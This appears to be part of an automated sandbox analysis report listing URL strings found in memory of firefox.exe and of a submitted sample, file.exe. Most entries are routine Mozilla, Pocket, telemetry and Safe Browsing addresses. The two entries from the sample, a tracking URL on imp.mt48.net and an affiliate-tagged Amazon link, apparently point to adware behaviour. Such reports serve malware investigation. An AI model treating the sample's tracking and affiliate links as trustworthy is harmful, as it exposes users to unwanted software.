Source: firefox.exe, 00000021.00000003.3245644401.00000169D1B82000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 00000021.00000003.3335063517.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3117298349.00000169D977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236635003.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 00000021.00000003.3335063517.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3117298349.00000169D977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236635003.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 00000021.00000003.3335063517.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3117298349.00000169D977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236635003.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 00000021.00000003.3017638643.00000169D9E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3074656356.00000169D9E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3022138525.00000169D9E1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 00000021.00000003.3080819409.00000169D9EF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3073977083.00000169D9EE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3037729550.00000169D9EF1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3277154502.00000169D9EE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3090339911.00000169D9EE6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3419032037.00000169D9EE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3020553973.00000169D9EEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3272670554.00000169D9ED1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3019064071.00000169D9EEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3031496954.00000169D9EEB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 00000021.00000003.3080819409.00000169D9EF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3073977083.00000169D9EE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3037729550.00000169D9EF1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3277154502.00000169D9EE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3090339911.00000169D9EE6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3419032037.00000169D9EE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3020553973.00000169D9EEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3272670554.00000169D9ED1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3019064071.00000169D9EEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3031496954.00000169D9EEB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 00000021.00000003.3017638643.00000169D9E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3074656356.00000169D9E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3022138525.00000169D9E1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 00000021.00000003.3017638643.00000169D9E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3074656356.00000169D9E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3022138525.00000169D9E1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 00000021.00000003.2921875534.00000169C9707000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2926052120.00000169C9729000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2918607295.00000169C9500000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000021.00000003.3070395841.00000169D5F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 00000021.00000003.3070395841.00000169D5F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 00000021.00000003.3335063517.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3117298349.00000169D977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236635003.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3377874942.00000169D9792000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 00000021.00000003.3373672563.00000169CBCC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3399821667.00000169CBCC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: firefox.exe, 00000021.00000003.3070395841.00000169D5F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: firefox.exe, 00000021.00000003.3415678742.00000169CAC8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/apps/relay
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: file.exe, 00000000.00000002.2426906219.0000000028C5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000021.00000003.3415887521.00000169CAC6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 00000021.00000003.3402637231.00000169D9740000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3146184459.00000169D9741000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3239166770.00000169D9741000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000021.00000003.3414526277.00000169CACBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/events/1/4a2f1980-72d4-4e52-ac06-64361
Source: firefox.exe, 00000021.00000003.3399821667.00000169CBCC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3400899355.00000169CAF85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3413469989.00000169CAF89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/metrics/1/52db9a1c-f748-48fa-a9e3-6dbf
Source: firefox.exe, 00000021.00000003.3389754862.00000169CAFCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/top-sites/1/d3698c60-da91-4f8c-b7c7-e1
Source: firefox.exe, 00000021.00000003.3397835645.00000169CD87C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3391857028.00000169CAEE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/messaging-system/undesired-events/1/19dc561a-517b-4875
Source: firefox.exe, 00000021.00000003.3397835645.00000169CD87C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3391531439.00000169CAEF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/messaging-system/undesired-events/1/39e48eef-5b6b-464c
Source: firefox.exe, 00000021.00000003.3400687801.00000169CAFCA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3389754862.00000169CAFCA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3392258143.00000169CAECB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/messaging-system/undesired-events/1/e86bff9f-a9ea-409f
Source: firefox.exe, 00000021.00000003.3335063517.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3117298349.00000169D977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236635003.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 00000021.00000003.3017638643.00000169D9E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3074656356.00000169D9E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3022138525.00000169D9E1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 00000021.00000003.3071622639.00000169CE4A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3395242716.00000169CB5D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3344434976.00000169CE4A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3154252426.00000169CE4A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000021.00000003.3017638643.00000169D9E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3074656356.00000169D9E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3022138525.00000169D9E1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 00000021.00000003.3017638643.00000169D9E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3074656356.00000169D9E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3022138525.00000169D9E1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 00000021.00000003.3017638643.00000169D9E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3074656356.00000169D9E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3022138525.00000169D9E1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 00000021.00000003.3416346439.00000169CAC5E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 00000021.00000003.3348526252.00000169CD866000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3397835645.00000169CD87C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3123001471.00000169C9ED9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000021.00000003.3353641675.00000169CC334000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: firefox.exe, 00000021.00000003.3414526277.00000169CACBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://push.services.mozilla.com
Source: firefox.exe, 00000021.00000003.3366955448.00000169CBDF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://push.services.mozilla.com/
Source: firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 00000021.00000003.3415533966.00000169CAC98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 00000021.00000003.3381962602.00000169CCDA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3157569738.00000169CCD94000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3254249599.00000169CCD94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2&
Source: firefox.exe, 00000021.00000003.3332342945.00000169D9978000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3234415020.00000169D9978000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3068413093.00000169D9977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000021.00000003.3115451545.00000169D9D97000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3139946227.00000169D9D97000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9D97000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 00000021.00000003.3115451545.00000169D9D97000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3139946227.00000169D9D97000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9D97000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 00000021.00000003.2918607295.00000169C9500000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000021.00000003.3415533966.00000169CAC98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=default-theme%40mozilla.org%2Caddons-
Source: firefox.exe, 00000021.00000003.3068413093.00000169D9977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000021.00000003.3068413093.00000169D9977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000021.00000003.3263338339.00000169CAB13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000021.00000003.3263338339.00000169CAB13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 00000021.00000003.3245644401.00000169D1B82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000021.00000003.3245644401.00000169D1B82000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 00000021.00000003.3335063517.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3117298349.00000169D977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3402637231.00000169D9740000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236635003.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3146184459.00000169D9741000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3239166770.00000169D9741000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000021.00000003.3263338339.00000169CAB13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000021.00000003.3263338339.00000169CAB13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 00000021.00000003.3353641675.00000169CC334000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/
Source: firefox.exe, 00000021.00000003.3220435804.00000169D9FBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 00000021.00000003.3377996257.00000169D96CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3325995840.00000169CC22F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3323203512.00000169D3478000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3360156556.00000169CC230000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3166300363.00000169CC230000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3260285389.00000169CC22F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 00000021.00000003.3415887521.00000169CAC81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/firefox-relay-integration
Source: firefox.exe, 00000021.00000003.3263338339.00000169CAB45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3389754862.00000169CAFCA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3392336336.00000169CAEC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3234415020.00000169D9978000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3068413093.00000169D9977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A49000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3415887521.00000169CAC81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaPlatformDecoderNotFound
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaWMFNeeded
Source: firefox.exe, 00000021.00000003.3112992386.00000169CBEA6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3057136407.00000169CBEA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3415127213.00000169CBEBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 00000021.00000003.3325262935.00000169D16A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
Source: firefox.exe, 00000021.00000003.3414526277.00000169CACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3415887521.00000169CAC81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefox
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: firefox.exe, 00000021.00000003.3017638643.00000169D9E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3074656356.00000169D9E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3022138525.00000169D9E1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 00000021.00000003.3353641675.00000169CC334000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com/
Source: firefox.exe, 00000021.00000003.3386641479.00000169CBCD6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3333005416.00000169D9941000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: chromecache_259.35.dr String found in binary or memory: https://uberproxy-pen-redirect.corp.google.com/uberproxy/pen?url=
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/
Source: firefox.exe, 00000021.00000003.3335063517.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3117298349.00000169D977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236635003.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3377874942.00000169D9792000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 00000021.00000003.3017638643.00000169D9E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3074656356.00000169D9E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3022138525.00000169D9E1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3120804832.00000169CBDBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 00000021.00000003.3399821667.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3373672563.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3097688805.00000169D9FE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3120804832.00000169CBDBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 00000021.00000003.3336782696.00000169D38FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3333005416.00000169D9941000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: file.exe, 00000000.00000002.2426906219.0000000028C5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: firefox.exe, 00000021.00000003.3245644401.00000169D1B82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3370039347.00000169CBD43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2926052120.00000169C9729000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2918607295.00000169C9500000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000021.00000003.3396520559.00000169D34CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3344209400.00000169CE4BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3245256810.00000169D34CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3341178431.00000169D34CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3322568003.00000169D34CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
Source: firefox.exe, 00000021.00000003.3399821667.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3373672563.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3120804832.00000169CBDBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
